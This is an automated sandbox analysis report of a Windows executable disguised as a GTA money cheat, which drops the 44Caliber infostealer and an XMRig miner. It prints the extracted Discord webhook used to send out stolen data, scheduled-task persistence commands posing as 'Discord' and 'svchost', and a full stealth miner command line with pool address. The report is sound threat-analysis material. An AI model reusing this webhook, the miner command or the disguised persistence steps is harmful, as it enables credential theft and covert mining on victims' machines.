Overview

overview

10

Static

static

3

7a154ab401...87.exe

windows7-x64

10

7a154ab401...87.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-05-2024 01:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7a154ab401c900bec51004c09941526f164eac0c97eb787030c768175957be87.exe

  • Size

    5.0MB

  • MD5

    46da75a26b19ac079ac537df27812f55

  • SHA1

    7ab3ebd563f09227daa95d45b25fc026105e8d43

  • SHA256

    7a154ab401c900bec51004c09941526f164eac0c97eb787030c768175957be87

  • SHA512

    33673daaec68ebef0723a9a1f840441da95d7d2a008aac608c784e398779e6a4a8f5730d0f0a7696ed08b48b6c3d74f2fc2a7f38484f89cd32b2eb26229562f8

  • SSDEEP

    98304:g3GjDdIVl8LhRqb8ilx8hdrHjIhwxocDbUZBpgpK0/v4bY4tBNpQ3zv:g3GjpIT8LhRfbnrUhkbUZwt/vsBNpC

Score
10/10
44caliberxmrigminerspywarestealer

Malware Config

Extracted

Family

44caliber

C2

https://ptb.discord.com/api/webhooks/1239364029244375071/mrn0rnvQsz0hP9WRY2zgSh8tpZjJuQUgSXwIwHvE-X3LUDAJxPRfGOKBwBADMBj39VKy

Signatures

  • 44Caliber

    An open source infostealer written in C#.

    stealer44caliber
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
  • Detects executables referencing Discord tokens regular expressions 2 IoCs
  • Detects executables referencing credit card regular expressions 2 IoCs
  • Detects executables referencing many VPN software clients. Observed in infosteslers 2 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
  • XMRig Miner payload 10 IoCs
    miner
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Kills process with taskkill 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\7a154ab401c900bec51004c09941526f164eac0c97eb787030c768175957be87.exe
    "C:\Users\Admin\AppData\Local\Temp\7a154ab401c900bec51004c09941526f164eac0c97eb787030c768175957be87.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3172
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\start.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1788
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\CheatGtaMoney.exe
        CheatGtaMoney.exe -p12345
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4968
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Cheat1.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Cheat1.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4528
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Cheat1.exe"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4176
            • C:\Windows\System32\cmd.exe
              "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1740
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
                7⤵
                • Creates scheduled task(s)
                PID:2044
            • C:\Windows\System32\cmd.exe
              "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1956
              • C:\Users\Admin\AppData\Local\Temp\Discord.exe
                C:\Users\Admin\AppData\Local\Temp\Discord.exe
                7⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:4408
                • C:\Windows\System32\conhost.exe
                  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
                  8⤵
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3172
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                    9⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:4060
                    • C:\Windows\System32\conhost.exe
                      "C:\Windows\System32\conhost.exe" "/sihost64"
                      10⤵
                        PID:2844
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=7201279 --pass=Cheat --cpu-max-threads-hint=50 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth
                      9⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4900
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Midnight.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Midnight.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2284
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\CheatMoney.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\CheatMoney.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2900
            • C:\Windows\System32\conhost.exe
              "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\CheatMoney.exe"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:5040
              • C:\Windows\System32\cmd.exe
                "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2740
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                  7⤵
                  • Creates scheduled task(s)
                  PID:2000
              • C:\Windows\System32\cmd.exe
                "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:3908
                • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                  C:\Users\Admin\AppData\Local\Temp\svchost.exe
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:3956
                  • C:\Windows\System32\conhost.exe
                    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                    8⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:4400
                    • C:\Windows\System32\cmd.exe
                      "cmd" cmd /c taskkill /f /PID "2844"
                      9⤵
                      • Suspicious use of WriteProcessMemory
                      PID:924
                      • C:\Windows\system32\taskkill.exe
                        taskkill /f /PID "2844"
                        10⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2232
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                      9⤵
                      • Executes dropped EXE
                      PID:4168
                      • C:\Windows\System32\conhost.exe
                        "C:\Windows\System32\conhost.exe" "/sihost64"
                        10⤵
                          PID:4576

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
        Filesize

        539B

        MD5

        b245679121623b152bea5562c173ba11

        SHA1

        47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

        SHA256

        73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

        SHA512

        75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\CheatGtaMoney.exe
        Filesize

        4.8MB

        MD5

        dc807927ced6c64280b41fbe25c8cd69

        SHA1

        26e8fceb928c61634e80af948d081f42c6d729f5

        SHA256

        9a323c74544544093d434730932dac056633ade3ba80b339dbb9b0700347f2e6

        SHA512

        a50474fd48d9af14d3e58cf93a3d6026384ce47f08ef2c7adba61060cda0aebd498e1f1fa39a7c03de83604e70823de379d61c719ed1590bc3f85b5929086535

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\start.bat
        Filesize

        42B

        MD5

        084d06c73d3444b46a1f49a0436e23e2

        SHA1

        74b6abceb89f7126a9661b8b57a090c660bb097e

        SHA256

        0d5e94ee28a9450af1b66669291a1f9ac60026f223ecc64acb3430954ce4c899

        SHA512

        d6908c1d06c64856d528f907804b77ae02024702ba8eac6583dbc284013f1e90e0bf5830f62a0641df62bd5310b4e4620e0a5c128a62673eb1f0f47b0476a49d

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Cheat1.exe
        Filesize

        2.1MB

        MD5

        7ced67a2b06d542de8884bd8ef3388c8

        SHA1

        c2892cb614be03ec39988f9eb1ee5a60dfa74fe4

        SHA256

        19b5505a570061e49819101533505d29bc37d74588b4fec9334e836ea5199ea8

        SHA512

        0303874a789e678861d0b3501b07ac67ad5d0fc69c6607093e59775d142d17e9171a8b66ae88b6a45bed5b0f4373d6897a6b631e8f3f04bc9cb64daebe0e7b40

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\CheatMoney.exe
        Filesize

        2.1MB

        MD5

        9508a0c17382c6ea967e0da17e23b0a2

        SHA1

        a696428ad01878d33051805e438a53c1bf10dd29

        SHA256

        82f9d14f7701edcad6ded45a0abd00e7bd13de1eaca985c2eb42caa108e25781

        SHA512

        f338d52012b1ff171e7d59cdefea8bd26958e9f8a3cf96abe51b43333119acf6371ad0fd7de321dd67f5a31130c9fa1ed7b68a98bec4b6ccb269b75966b69aa6

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Midnight.exe
        Filesize

        303KB

        MD5

        f80513b43523603b69ab94be37708772

        SHA1

        942117fd4a9000dbeb8c42618ed3319dc97f9920

        SHA256

        7123cd4648ece02f06576c96c9862404c20f83e1e5bc8505a7148dc618d9dcd8

        SHA512

        1cb14391ffad0fa71dd2cf39ff93846ce1dd6305aa76ce1e0545fe11155af93136a6bf79bc4dec50f400f1417d3222c16f08e8d37689eaaa0fd8dc2dbff15a53

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
        Filesize

        14KB

        MD5

        0c0195c48b6b8582fa6f6373032118da

        SHA1

        d25340ae8e92a6d29f599fef426a2bc1b5217299

        SHA256

        11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

        SHA512

        ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        Filesize

        30KB

        MD5

        0fc88f751a732f0441955d51b896e203

        SHA1

        429b03e355f1200eabc1867d0a07254fc5a2c1ad

        SHA256

        38c5252e0079a6fde514d5057a53981551fe57691cb58c17ea5e98aa2405d962

        SHA512

        a66e97ebd914dfab03677f4ea81d4c1a2ce108c7f4b4d490c0a60f7a5228ab6ad5ce701e62f658ff9c7c84e95c1d6272e5b563f52fd717b325bbc50059dd43c6

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        Filesize

        31KB

        MD5

        99f6ddfde83c4a40084b29ec309336c7

        SHA1

        7246f470c153a8c107fb4ff153da01f76c14db8e

        SHA256

        37773977416a09ae07d05dda3ecf488bba262436cd59a161f8189aeac5a35c81

        SHA512

        c488d00bf7678d4c28b392ddf8749cdef8875b0e451c4e7d1dcf214acbd15bfc2d71d6514c3e122a2dd7fc91aee9d4257d4551eeb12983a2858c14c8ddf23b95

        Download Submit

      • memory/2284-66-0x000002567D970000-0x000002567DADA000-memory.dmp

        Filesize

        1.4MB

        Download

      • memory/2284-36-0x00000256632A0000-0x00000256632F2000-memory.dmp

        Filesize

        328KB

        Download

      • memory/2844-111-0x000001B99F330000-0x000001B99F336000-memory.dmp

        Filesize

        24KB

        Download

      • memory/2844-113-0x000001B99F690000-0x000001B99F696000-memory.dmp

        Filesize

        24KB

        Download

      • memory/4176-35-0x000001DDCD290000-0x000001DDCD2A2000-memory.dmp

        Filesize

        72KB

        Download

      • memory/4176-34-0x000001DDE5F40000-0x000001DDE6160000-memory.dmp

        Filesize

        2.1MB

        Download

      • memory/4176-23-0x000001DDCB320000-0x000001DDCB540000-memory.dmp

        Filesize

        2.1MB

        Download

      • memory/4576-126-0x0000027DBA7F0000-0x0000027DBA7F6000-memory.dmp

        Filesize

        24KB

        Download

      • memory/4576-125-0x0000027DBA480000-0x0000027DBA486000-memory.dmp

        Filesize

        24KB

        Download

      • memory/4900-94-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/4900-98-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/4900-99-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/4900-107-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/4900-102-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/4900-109-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/4900-108-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/4900-100-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/4900-101-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/4900-96-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/4900-97-0x00000000021C0000-0x00000000021E0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/5040-82-0x0000023723890000-0x0000023723AB0000-memory.dmp

        Filesize

        2.1MB

        Download

      • memory/5040-80-0x0000023708DB0000-0x0000023708FD0000-memory.dmp

        Filesize

        2.1MB

        Download